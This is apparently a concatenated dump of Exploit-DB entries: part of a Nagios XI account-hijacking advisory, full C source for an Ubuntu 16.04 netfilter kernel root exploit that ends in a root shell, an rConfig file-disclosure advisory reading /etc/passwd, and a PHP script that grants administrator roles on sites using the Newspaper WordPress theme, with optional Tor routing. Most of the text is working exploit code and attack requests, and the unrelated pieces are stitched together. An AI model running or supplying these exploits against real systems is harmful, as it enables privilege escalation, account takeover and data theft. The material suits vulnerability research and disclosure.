The Nagios XI application is vulnerable to an arbitrary account
hijacking vulnerability due to an insecure implementation of the
password reset functionality. The application does not enforce any
verification to confirm the provided reset token can only be used to
change the login credentials for the specific user for which it was
generated. A limited user can therefore abuse the password reset
functionality to hijack an administrative account by tampering with the
‘username’ hidden parameter during the password reset process.
[POC - ACCOUNT HIJACKING 'nagiosadmin']
POST /nagiosxi/login.php?finishresetpass&username=stduser&token-<reset
token> HTTP/1.1
token=<reset
token>&username=nagiosadmin&password1=<PASSWORD>&password2=<PASSWORD>&reset=1
+----------+
| Solution |
+----------+
Upgrade to Nagios XI 5.2.8.
Please note at the time of this writing the privilege escalation
vulnerability is still unpatched. The SSRF vulnerabilities have been
only partially fixed by blacklisting the 'file://' handler, but all the
other SSRF attack vectors are still exploitable. Vendor stated these
vulnerabilities will be likely patched on the next release of the
application as they require authentication and as such are not
considered major security issues.
+------------+
| Timeline |
+------------+
13/05/2016 – Initial disclosure to vendor
14/05/2016 – Vendor confirms receipt of advisory
25/05/2016 – Vendor provides fixes for most of the vulnerabilities
25/05/2016 – Enquiry about the status of fixes for the unpatched
vulnerabilities
26/05/2016 – Vendor responded with “Since the major issues have been
fixed and the remaining issues I'd like to touch up are only available
if the user is logged in, or logged in as admin, I don't see a reason to
hold onto releasing the advisory.”
2/06/2016 – Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support dectected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
Title
===================
rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
Summary
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
Affected Products
===================
rConfig 3.1.1 and earlier
CVE
===================
N/A
Details
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
Verification of Vulnerability
===================
The following steps can be carried out in duplicating this vulnerability.
Step 1:
Enter the following into your browser address bar:
http://<SERVER>/lib/crud/downloadFile.php?download_file=/etc/passwd
Step 2:
Confirm that the passwd file is valid
Impact
===================
Information Disclosure. User privileges and unauthorized access to the system.
Credits
===================
Gregory Pickett (@shogun7273), Hellfire Security
<?php
/**
* Exploit Title: Newspaper WP Theme Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://tagdiv.com/newspaper/
* Software Link: http://themeforest.net/item/newspaper/5489609
* Version: 6.7.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: WP Options Overwrite, Possible more
* Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case "admin_on":
echo "Setting default role to Administrator \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator');
break;
case "admin_off":
echo "Setting default role to Subscriber \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber');
break;
case "reg_on":
echo "Enabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1');
break;
case "reg_on":
echo "Disabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0');
break;
}
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Newspaper WP Theme Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE]
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Default admin level on reg. admin_off - Default subscriber on reg.
reg_on - Turns on user registration. reg_off - Turns off user registrations.
Trun on registrations, set default level to admin, register a user on the webiste,
turn off admin mode, turn off user registrations.
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_on
[Register a new user as Admin]
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}